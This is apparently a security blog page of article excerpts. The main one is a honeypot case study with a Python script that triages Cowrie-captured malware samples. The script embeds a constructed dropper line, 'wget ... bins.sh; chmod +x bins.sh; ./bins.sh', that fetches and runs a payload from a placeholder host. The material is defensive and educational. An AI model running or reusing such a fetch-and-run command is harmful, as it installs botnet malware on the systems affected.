
Catching hackers with a honeypot - Case study

· 11 min read
Orkanyx
Creator of Cyberforge

Getting the sample

For this first case study, we base our analysis on a sample captured by Cowrie, the SSH/Telnet honeypot bundled with T-Pot. Captured samples are stored in the T-Pot installation folder, under /data/cowrie/downloads/.

warning

The samples are live malware. Handle them with caution, and only inside a VM with no network connection.

info

This first case study concerns a shell script (.sh) that an attacker ran on the honeypot to enlist the host in a botnet.
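Before opening a sample, it helps to know exactly which file you are looking at and which honeypot session fetched it. The script below is an added example for this case study, not tooling from the article or from the T-Pot project: it walks a downloads directory, hashes each file, classifies it from its first bytes rather than its name, and joins it to the Cowrie session that downloaded it. It assumes that Cowrie stores each download under its SHA-256 and that its JSON log carries `cowrie.session.file_download` events with `shasum`, `url` and `src_ip` fields (field names as the author of this example understands Cowrie's log format); the sample file and log lines are constructed inline, using the 203.0.113.0/24 documentation range, so nothing here touches a real network.

```python
import hashlib
import json
import os
import tempfile

# Constructed stand-in for a dropper script of the kind Cowrie captures.
# It is NOT the sample from the article; it only mimics the shape
# (shebang + fetch-and-run one-liner). 203.0.113.0/24 never routes.
SAMPLE_SCRIPT = (
    b"#!/bin/sh\n"
    b"cd /tmp || cd /var/run\n"
    b"wget http://203.0.113.10/bins.sh; chmod +x bins.sh; ./bins.sh\n"
)
# Minimal ELF magic plus padding, standing in for a binary payload.
SAMPLE_ELF = b"\x7fELF" + b"\x00" * 60


def sha256_file(path: str) -> str:
    """Hash a file in chunks so large payloads never sit in memory whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def classify(path: str) -> str:
    """Coarse file type from the leading bytes, never from the extension."""
    with open(path, "rb") as f:
        head = f.read(64)
    if head.startswith(b"\x7fELF"):
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    return "unknown"


def load_download_events(log_lines):
    """Index cowrie.session.file_download events by their reported SHA-256.

    Field names (eventid, shasum, url, src_ip) are an assumption about
    Cowrie's JSON log; the lines fed in here are constructed examples.
    """
    by_hash = {}
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("eventid") == "cowrie.session.file_download" and "shasum" in ev:
            by_hash.setdefault(ev["shasum"], []).append(ev)
    return by_hash


def triage(downloads_dir: str, log_lines):
    """One record per file: hash, type, size, and the sessions that fetched it."""
    events = load_download_events(log_lines)
    report = []
    for name in sorted(os.listdir(downloads_dir)):
        path = os.path.join(downloads_dir, name)
        if not os.path.isfile(path):
            continue
        digest = sha256_file(path)
        evs = events.get(digest, [])
        report.append({
            "file": name,
            "sha256": digest,
            "kind": classify(path),
            "size": os.path.getsize(path),
            "urls": sorted({e.get("url", "") for e in evs}),
            "src_ips": sorted({e.get("src_ip", "") for e in evs}),
            # Cowrie names downloads by hash; a mismatch means the file was renamed.
            "name_matches_hash": name == digest,
        })
    return report


def build_demo_dir():
    """Create a throwaway downloads/ directory plus matching constructed log lines."""
    d = tempfile.mkdtemp(prefix="cowrie_downloads_")
    script_hash = hashlib.sha256(SAMPLE_SCRIPT).hexdigest()
    with open(os.path.join(d, script_hash), "wb") as f:
        f.write(SAMPLE_SCRIPT)
    # A second file with no download event, to show an unreferenced sample.
    with open(os.path.join(d, "unreferenced.bin"), "wb") as f:
        f.write(SAMPLE_ELF)
    log_lines = [
        json.dumps({"eventid": "cowrie.session.file_download",
                    "timestamp": "2024-09-01T03:14:07.000000Z",
                    "src_ip": "203.0.113.55", "session": "a1b2c3d4e5f6",
                    "url": "http://203.0.113.10/bins.sh",
                    "outfile": "var/lib/cowrie/downloads/" + script_hash,
                    "shasum": script_hash}),
        json.dumps({"eventid": "cowrie.login.success", "src_ip": "203.0.113.55",
                    "username": "root", "password": "123456"}),
    ]
    return d, log_lines


def demo():
    d, log_lines = build_demo_dir()
    return triage(d, log_lines)


if __name__ == "__main__":
    for rec in demo():
        print(json.dumps(rec, indent=2))
```

On a real T-Pot box you would point `triage()` at the downloads folder and feed it the lines of Cowrie's JSON log instead of the constructed ones; run it on a copy of the data inside the analysis VM, never on the honeypot host itself.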

Catching Hackers with a Honeypot - Installation

· 8 min read
Orkanyx
Creator of Cyberforge

We have always been told that in cybersecurity, attackers are always one step ahead. They will use vulnerabilities and/or techniques that defenders know nothing about.

Thus, to reduce this gap, defenders have found a method that allows them to both protect themselves and understand the new techniques used by attackers. This method is called a honeypot.

A honeypot is a decoy system that is deliberately exposed, and often deliberately vulnerable, so that attackers interact with it while every action is logged. The objective is to collect IOCs (Indicators of Compromise) and IOAs (Indicators of Attack) and to understand the techniques attackers use.

In this article, we will discuss the deployment of T-Pot, the honeypot platform created by Deutsche Telekom.

How to create an Android lab in order to analyse Android applications

· 9 min read
Orkanyx
Creator of Cyberforge

Introduction

Creating an Android lab for dynamic and static analysis of Android applications is a crucial step for security researchers and developers who want to analyze and improve the security of mobile applications. This guide provides detailed steps to set up a secure and effective testing environment, using tools like Frida, Magisk, and other essential resources.

The brute-forcing of virtual MAC addresses, the thorn in the side of illegal IPTV servers.

· 8 min read
Orkanyx
Creator of Cyberforge

Introduction

On July 14, 2024, DAZN, a sports streaming service, acquired the rights to Ligue 1 for 400 million euros.

It offers supporters two subscription plans, including one at €30 per month with a 12-month commitment, covering every Ligue 1 match except one broadcast by beIN Sports.

A French supporter therefore has to spend €45 per month just to watch Ligue 1. It hardly needs proving that this model will not work, especially since DAZN needs 1.5 million subscribers to be profitable.

Using IPTV is therefore an alternative for these supporters, who are burdened with increasingly high costs each year to watch their favorite team.

This article explores how IPTV works, including its server side and its connection and authentication methods.